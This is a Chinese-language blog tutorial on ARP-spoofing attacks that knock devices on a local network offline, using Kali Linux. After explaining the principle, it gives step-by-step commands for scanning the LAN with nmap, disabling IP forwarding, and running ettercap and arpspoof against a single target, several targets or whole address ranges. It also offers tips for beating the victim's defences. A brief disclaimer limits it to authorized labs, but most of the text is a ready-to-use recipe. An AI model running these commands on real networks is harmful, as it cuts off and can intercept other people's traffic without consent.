利用ARP欺骗进行断网攻击

注意：本文章仅用于技术学习与交流，所有演示均在合法授权的靶机环境中完成。请勿将文中技术用于任何违法违规活动，否则后果自负。

前言及失败原因

首先需要知道，ARP欺骗只能在局域网环境下进行，并且仅用于IPv4。
其次为什么很多人尝试过后，靶机仍然能上网或攻击效果不佳呢？
一般原因为以下几点：
1.靶机存在主动防御，安装并打开火绒等杀毒软件的靶机，其杀毒软件主动开启了ARP防御，关闭杀毒软件即可解决。
2.靶机设置了静态ARP绑定，无法欺骗。(可能性极小，因为设置了静态绑定，就需要每切换一个局域网后都要重新进行静态ARP绑定）
3.移动操作系统作为靶机时往往都会攻击失败，简单的解释就是在IPv4被切断后，其会积极的切换到IPv6通道进行上网，许多电脑的应用程序不会切换。
其它问题，读者可以自行上网查阅资料或者评论私信作者来解决问题。

一、原理

ARP（Address Resolution Protocol）断网攻击基于 ARP 协议的设计缺陷，通过伪造 ARP响应报文篡改目标设备的 ARP 缓存表，实现 IP-MAC 映射劫持，导致目标设备数据转发路径异常，最终达成断网效果。

• 网关：相当于你家小区的 “大门”，所有设备（手机、电脑）要上网，必须把数据发给网关，再由网关转发到互联网。
• ARP 缓存表：每个设备里都有一张 “地址通讯录”，记录着 “谁的 IP 对应谁的 MAC 地址”（比如网关的 IP 和网关的真实 MAC
  地址）。设备发数据时，会先查这张表，找到目标的 MAC 地址才能发送。

ARP 断网攻击的本质是：用伪造的 ARP 消息，篡改目标设备的 “地址通讯录”（ARP 缓存表），让目标设备把数据发给错误的对象，导致无法正常上网。
打个比方：

• 正常情况：你的电脑要上网，查 “通讯录”→ 找到网关的真实 MAC 地址→ 数据发给网关→ 成功上网。
• 攻击后：攻击者伪造一条 “假消息” 给你的电脑，说 “网关的 IP 对应的 MAC 地址是我（攻击者）的 MAC”→ 你的电脑更新
  “通讯录”→ 后续数据都发给了攻击者，而不是真正的网关→ 无法上网（断网）。

二、前提准备

攻击机:Kali-linux
下载VM虚拟机软件(VMware Workstation)【VM虚拟机下载地址】
在虚拟机中导入Kali-linux操作系统,并设置为桥接模式【Kali-linux下载地址】

Kali Linux 是由 Offensive Security 开发维护的专业网络安全测试操作系统，基于 Debian 发行版重构而来（2013 年正式发布，前身是 BackTrack Linux），核心定位是为安全从业者提供 “开箱即用” 的渗透测试与安全审计环境。

本文为纯技术分享，详细安装教程请跳转其他博客！！！

三、操作

1. 进入Kali虚拟机：通过镜像安装的虚拟机用户名和密码都是kali.

2. 鼠标右键打开终端

3. 切换成超级管理员 ：指令sudo su，输入密码，回车 (镜像安装的kali密码是kali,在输密码时内容不会显示出来，输完直接回车就行)

4.获取网关ip和kali虚拟机ip：指令ifconfig，该虚拟机ip为192.168.1.37，则网关为192.168.1.1（默认配置习惯，99%网关都是[* .* .* . 1]，不相信可以输入指令route -n,Gateway列的ip就是网关）

5. 扫描局域网的所有ip：指令nmap 192.168.1.0-255(根据自己ip自行修改）

6. 关闭流量转发：指令echo 0 > /proc/sys/net/ipv4/ip_forward,重启虚拟机自动恢复，手动恢复指令echo 1 > /proc/sys/net/ipv4/ip_forward

7. 选择靶机ip：由于我的靶机ip为192.168.1.8，所有我选择攻击它

8. 目前先展示2种攻击工具
   （1）ettercap工具：指令ettercap -Tq -i eth0 -M arp:remote /192.168.1.1//192.168.1.8/
   （格式为 ettercap -Tq -i eth0 -M arp:remote /网关ip//靶机ip/ ，自行更换）

攻击多个：ettercap -Tq -i eth0 -M arp:remote /网关ip//靶机1ip,靶机2ip,靶机3ip/ 加逗号分隔各个靶机IP
批量攻击：ettercap -Tq -i eth0 -M arp:remote /网关ip//192.168.1.20-80/ 用“-”连接一个区间， 注意:需要替换成实际靶机ip共同的前三段

(2)arpspoof工具：指令arpspoof -i eth0 -t 192.168.1.8 -r 192.168.1.1
（格式为 arpspoof -i eth0 -t 靶机ip -r 网关ip）

攻击多个：额，不支持！！，因为arpspoof是单目标工具，但是可以开多个终端，每个终端攻击一个，来实现攻击多个！！！

四、结语

ARP欺骗时，由于虚拟机资源不足、网络带宽占用过高、流量处理压力过大等原因，自己的虚拟机有可能变得卡顿，因“机”而异。

最后，做一个守法好公民，让技术服务于我们！